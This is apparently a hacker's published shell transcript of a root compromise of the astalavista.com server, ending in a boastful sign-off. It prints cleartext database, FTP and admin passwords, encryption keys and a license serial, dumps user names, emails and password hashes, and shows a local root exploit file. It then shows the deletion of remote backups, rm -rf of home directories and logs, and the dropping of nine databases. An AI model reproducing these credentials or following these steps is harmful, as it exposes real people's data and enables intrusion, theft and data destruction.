sh-3.2# cat .my.cnf
[client]
user=da_admin
password=X9dctmRH

sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh
##########################################################
# #
# incremental backup for astalavista.com #
# #
# author: Paulo M. Santos #
# #
##########################################################
[snip]
PROG_DIR="/home/com/backup_system";
BACKUP_DIR="/home/com/backups";
DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
# ftp for synology backup server
FTP_HOST="212.254.194.163";
FTP_PORT="21";
FTP_USER="astalavista.com";
FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
FTP_DIR="/astalavista.com";
# database
DB_HOST="localhost";
DB_USER="contrexxuser2";
DB_PASS="0fEYNZgXz1pKe";
DB_DATABASE1="com_contrexx2_live";
DB_DATABASE2="com_contrexx2";
[snip]
ftp -in $FTP_HOST $FTP_PORT <<EOF
quote USER $FTP_USER
quote PASS $FTP_PASS
cd $FTP_DIR
put $DB_FULLNAME-SQL_Dump.tar
put $BACKUP_FULLNAME-Public_HTML.tar
close
bye
EOF

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
-rw------- 1 root root 8192 Jun 4 03:03 aquota.group
-rw------- 1 root root 8192 Jun 3 02:45 aquota.user
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
drwx--x--x 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
drwx------ 3 jon jon 4096 Sep 21 2007 jon
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
drwx------ 2 jon jon 4096 Sep 15 2007 test
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp

sh-3.2# cd admin
sh-3.2# ls -la
total 1735896
drwx--x--x 9 admin admin 4096 Nov 28 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
drwx------ 2 admin admin 4096 Sep 28 2007 backups
-rw------- 1 admin admin 860 Sep 17 2008 .bash_history
-rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
-rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
-rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
-rw-r--r-- 1 root root 24 Sep 21 2007 info.php
drwx------ 2 admin admin 4096 Sep 21 2007 mail
-rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
-rw-r--r-- 1 root root 887 Nov 28 2007 server.key
-rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
-rw-r----- 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups

sh-3.2# ..
sh-3.2# cd jon
sh-3.2# ls -la
total 36
drwx------ 3 jon jon 4096 Sep 21 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw------- 1 jon jon 53 Sep 21 2007 .bash_history
-rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
-rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
-rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
-rw-r--r-- 1 root root 24 Sep 21 2007 info.php
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html

sh-3.2# cd ..
sh-3.2# cd test
sh-3.2# ls -la
total 48
drwx------ 2 jon jon 4096 Sep 15 2007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw------- 1 jon jon 79 Sep 21 2007 .bash_history
-rw-r--r-- 1 jon jon 24 Sep 15 2007 .bash_logout
-rw-r--r-- 1 jon jon 176 Sep 15 2007 .bash_profile
-rw-r--r-- 1 jon jon 124 Sep 15 2007 .bashrc
sh-3.2# cat .bash_history
/usr/bin/mysqladmin -u root password PoliuJhytg67

sh-3.2# cd ..
sh-3.2# cd astanet
sh-3.2# ls -la
total 52
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
-rw------- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow

sh-3.2# cd auth/
sh-3.2# ls -la
total 28
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 ..
-rw-r--r-- 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
-rw-r--r-- 1 root root 319 Jan 5 2006 hosting.config.inc.php
-rw-r--r-- 1 root root 24 Jun 4 09:38 .htadm_pwd
-rw-r--r-- 1 root root 49 Jan 5 2006 .htpasswd_newhosting
-rw-r--r-- 1 root root 51 Oct 11 2006 .htwebalizer_pwd

sh-3.2# cat hackercontest.config.inc.php
// Variables for the database connection //
$conxHost = 'localhost'; // MySQL hostname
$conxUser = 'hackercontest'; // MySQL user
$conxPassword = 'K6m@7dUc'; // MySQL password
$bfkey = 'cXvB3981'; // Encryption/Decryption Key for Blowfish
?>
sh-3.2# cat hosting.config.inc.php
// Variables for the database connection //
$conxHost = 'localhost'; // MySQL hostname
$conxUser = 'hostinguser'; // MySQL user
$conxPassword = 'cXvB3981'; // MySQL password
$bfkey = 'cXvB3981'; // Encryption/Decryption Key for Blowfish
?>

sh-3.2# cd ..
sh-3.2# cd com
sh-3.2# ls -la
total 141208
drwx--x--x 10 com com 4096 Apr 28 12:40 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwx------ 2 com com 4096 Jun 4 04:04 backups
-rw-r--r-- 1 root root 2419504 Sep 28 2007 backup.sql
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
-rw------- 1 com com 21880 Jun 2 08:07 .bash_history
-rw-r--r-- 1 com com 24 Sep 24 2007 .bash_logout
-rw-r--r-- 1 com com 176 Sep 24 2007 .bash_profile
-rw-r--r-- 1 com com 124 Sep 24 2007 .bashrc
drwx--x--x 3 com com 4096 Jan 29 2008 domains
-rw-r--r-- 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
drwxrwx--- 3 com mail 4096 Jan 6 19:24 imap
-rw------- 1 com com 69 Nov 18 2008 .lesshst
drwx------ 2 com com 4096 Sep 24 2007 mail
-rw------- 1 com com 13970 Mar 28 21:42 .mysql_history
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
-rw-r----- 1 com mail 34 Sep 24 2007 .shadow
drwx------ 2 com com 4096 Aug 26 2008 .ssh
-rwx------ 1 com com 8515 Feb 10 2008 t
-rw-rw-r-- 1 com com 6265 Feb 11 2008 t.c
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
-rw-rw-r-- 1 com com 617 May 20 2008 .toprc
-rw-rw-r-- 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
-rw------- 1 com com 16629 Mar 28 21:46 .viminfo
-rw-rw-r-- 1 com com 51 Aug 25 2008 .vimrc

sh-3.2# head t.c
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*

sh-3.2# cd /
sh-3.2# ls -la
total 360
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
-rw------- 1 root root 10240 Jun 3 02:39 aquota.group
-rw------- 1 root root 10240 Jun 3 02:39 aquota.user
-rw-r----- 1 root root 819 Jul 17 2008 astalavista.us.db
-rw-r--r-- 1 root root 0 Jun 3 02:43 .autofsck
-rw-r--r-- 1 root root 0 Sep 16 2007 .autorelabel
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
-rw-r--r-- 1 root root 13387 Mar 20 2008 httpd.conf
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
-rw-r--r-- 1 root root 5859 Feb 3 2008 mrtg.cfg
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
drwxr-x--- 15 root root 4096 Jun 4 08:40 root
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var

sh-3.2# cd opt
sh-3.2# ls -la
total 20
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws

sh-3.2# cd lsws/
sh-3.2# ls -la
total 108
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
drwx------ 4 apache apache 4096 Jun 3 02:43 conf
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
-rw-r--r-- 1 root root 6959 May 29 15:10 LICENSE
-rw-r--r-- 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
-rw-r--r-- 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
-rw-r--r-- 1 root root 3208 May 29 15:10 LICENSE.PHP
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
drwx------ 2 apache apache 4096 Mar 20 2008 phpbuild
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
-rw-r--r-- 1 root root 6 May 29 15:10 VERSION

sh-3.2# cd conf
sh-3.2# ls -la
total 48
drwx------ 4 apache apache 4096 Jun 3 02:43 .
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
drwx------ 2 apache apache 4096 Mar 20 2008 cert
-rw-r--r-- 1 apache apache 6668 May 29 15:13 httpd_config.xml
-rw------- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
-rw-r--r-- 1 root apache 0 Jun 3 14:11 .last
-rw------- 1 apache apache 256 May 29 15:10 license.key
-rw------- 1 apache apache 256 Mar 21 2008 license.key.old
-rw------- 1 apache apache 3320 Mar 20 2008 mime.properties
-rw------- 1 apache apache 20 May 29 15:10 serial.no
drwx------ 2 apache apache 4096 Mar 20 2008 templates

sh-3.2# cat serial.no
IbDl-oVsO-CKqL-wVRa

sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 286844
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database |
+-----------------------+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem |
| com_contrexx |
| com_contrexx2 |
| com_contrexx2_live |
| da_roundcube |
| dolphin |
| ideapool |
| mysql |
| test |
| yourmaster |
+-----------------------+
14 rows in set (0.00 sec)

mysql> use ideapool
Database changed
mysql> show tables;
+-----------------------------------+
| Tables_in_ideapool |
+-----------------------------------+
| eventum_columns_to_display |
| eventum_custom_field |
| eventum_custom_field_option |
| eventum_custom_filter |
| eventum_customer_account_manager |
| eventum_customer_note |
| eventum_email_account |
| eventum_email_draft |
| eventum_email_draft_recipient |
| eventum_email_response |
| eventum_faq |
| eventum_faq_support_level |
| eventum_group |
| eventum_history_type |
| eventum_irc_notice |
| eventum_issue |
| eventum_issue_association |
| eventum_issue_attachment |
| eventum_issue_attachment_file |
| eventum_issue_checkin |
| eventum_issue_custom_field |
| eventum_issue_history |
| eventum_issue_quarantine |
| eventum_issue_requirement |
| eventum_issue_user |
| eventum_issue_user_replier |
| eventum_link_filter |
| eventum_mail_queue |
| eventum_mail_queue_log |
| eventum_news |
| eventum_note |
| eventum_phone_support |
| eventum_project |
| eventum_project_category |
| eventum_project_custom_field |
| eventum_project_email_response |
| eventum_project_field_display |
| eventum_project_group |
| eventum_project_link_filter |
| eventum_project_news |
| eventum_project_phone_category |
| eventum_project_priority |
| eventum_project_release |
| eventum_project_round_robin |
| eventum_project_status |
| eventum_project_status_date |
| eventum_project_user |
| eventum_reminder_action |
| eventum_reminder_action_list |
| eventum_reminder_action_type |
| eventum_reminder_field |
| eventum_reminder_history |
| eventum_reminder_level |
| eventum_reminder_level_condition |
| eventum_reminder_operator |
| eventum_reminder_priority |
| eventum_reminder_requirement |
| eventum_reminder_triggered_action |
| eventum_resolution |
| eventum_round_robin_user |
| eventum_search_profile |
| eventum_status |
| eventum_subscription |
| eventum_subscription_type |
| eventum_support_email |
| eventum_support_email_body |
| eventum_time_tracking |
| eventum_time_tracking_category |
| eventum_user |
+-----------------------------------+
69 rows in set (0.00 sec)

mysql> describe eventum_user;
+-------------------------+------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-------------------------+------------------+------+-----+---------------------+----------------+
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
| usr_customer_id | int(11) unsigned | YES | | NULL | |
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
| usr_status | varchar(8) | NO | | active | |
| usr_password | varchar(32) | NO | | | |
| usr_full_name | varchar(255) | NO | | | |
| usr_email | varchar(255) | NO | UNI | | |
| usr_preferences | longtext | YES | | NULL | |
| usr_sms_email | varchar(255) | YES | | NULL | |
| usr_clocked_in | tinyint(1) | YES | | 0 | |
| usr_lang | varchar(5) | YES | | NULL | |
+-------------------------+------------------+------+-----+---------------------+----------------+
13 rows in set (0.00 sec)

mysql> select usr_full_name,usr_email,usr_password from eventum_user;
+----------------------+-------------------------------+----------------------------------+
| usr_full_name | usr_email | usr_password |
+----------------------+-------------------------------+----------------------------------+
| system | system-account@example.com | 14589714398751513457adf349173434 |
| Developer (Paulo) | paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
| Be1er0ph0r | be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
| Admin | pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
| ADMIN | admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
| USER | user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
| Glafkos - (nowayout) | glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
| Joao | joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
| Pascal | pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
| commander | commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
| ishtus | ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
| sykadul | sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
| Zach McElroy | admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
| usb | usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
| cyph3r | cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
+----------------------+-------------------------------+----------------------------------+
15 rows in set (0.00 sec)

mysql> exit
Bye


sh-3.2# ftp 212.254.194.163
Connected to 212.254.194.163.
220 BackupCOM_VW FTP server ready.
504 AUTH: security mechanism 'GSSAPI' not supported.
504 AUTH: security mechanism 'KERBEROS_V4' not supported.
KERBEROS_V4 rejected as an authentication type
Name (212.254.194.163:root): astalavista.com
331 Password required for astalavista.com.
Password:
230 User astalavista.com logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,188)
150 Opening BINARY mode data connection for 'file list'.
dr-x------ 1 root users 4096 Jun 4 06:13 astalavista.com
226 Transfer complete.
ftp> cd astalavista.com
250 CWD command successful.
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,189)
150 Opening BINARY mode data connection for 'file list'.
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
[snip]
226 Transfer complete.
ftp> mdelete *
ftp> ls -la
227 Entering Passive Mode (212,254,194,163,2,193)
150 Opening BINARY mode data connection for 'file list'.
226 Transfer complete.
ftp>

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
-rw------- 1 root root 8192 Jun 4 03:03 aquota.group
-rw------- 1 root root 8192 Jun 3 02:45 aquota.user
drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
drwx--x--x 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
drwx------ 3 jon jon 4096 Sep 21 2007 jon
drwx------ 2 root root 16384 Sep 11 2007 lost+found
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
drwx------ 2 jon jon 4096 Sep 15 2007 test
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp

sh-3.2# rm -rf backup/
sh-3.2# rm -rf backup.14161/
sh-3.2# rm -rf ftp/
sh-3.2# rm -rf jon/
sh-3.2# rm -rf my/
sh-3.2# rm -rf mysqldata/
sh-3.2# rm -rf test/
sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd': Directory not empty
sh-3.2# rm -rf /home/*
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 407156
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database |
+-----------------------+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem |
| com_contrexx |
| com_contrexx2 |
| com_contrexx2_live |
| da_roundcube |
| dolphin |
| ideapool |
| mysql |
| test |
| yourmaster |
+-----------------------+
14 rows in set (0.03 sec)

mysql> drop database astanet_membersystem;
Query OK, 46 rows affected (0.81 sec)

mysql> drop database com_contrexx;
Query OK, 211 rows affected (2.72 sec)

mysql> drop database com_contrexx2;
Query OK, 237 rows affected (2.23 sec)

mysql> drop database com_contrexx2_live;
Query OK, 227 rows affected (7.63 sec)

mysql> drop database ideapool;
Query OK, 69 rows affected (0.19 sec)

mysql> drop database yourmaster;
Query OK, 158 rows affected (0.55 sec)

mysql> drop database astanet_ads;
Query OK, 9 rows affected (0.11 sec)

mysql> drop database astanet_mailing_lists;
Query OK, 24 rows affected (1.47 sec)

mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec)

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| da_roundcube |
| dolphin |
| mysql |
| test |
+--------------------+
5 rows in set (0.00 sec)

=============================================================


This case proves that above the sky there is still another sky: there is always someone stronger.
That is the only thing we need to remember.




REGARDS

ELV1N4

On 8/10/09 at 9:17 PM
elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org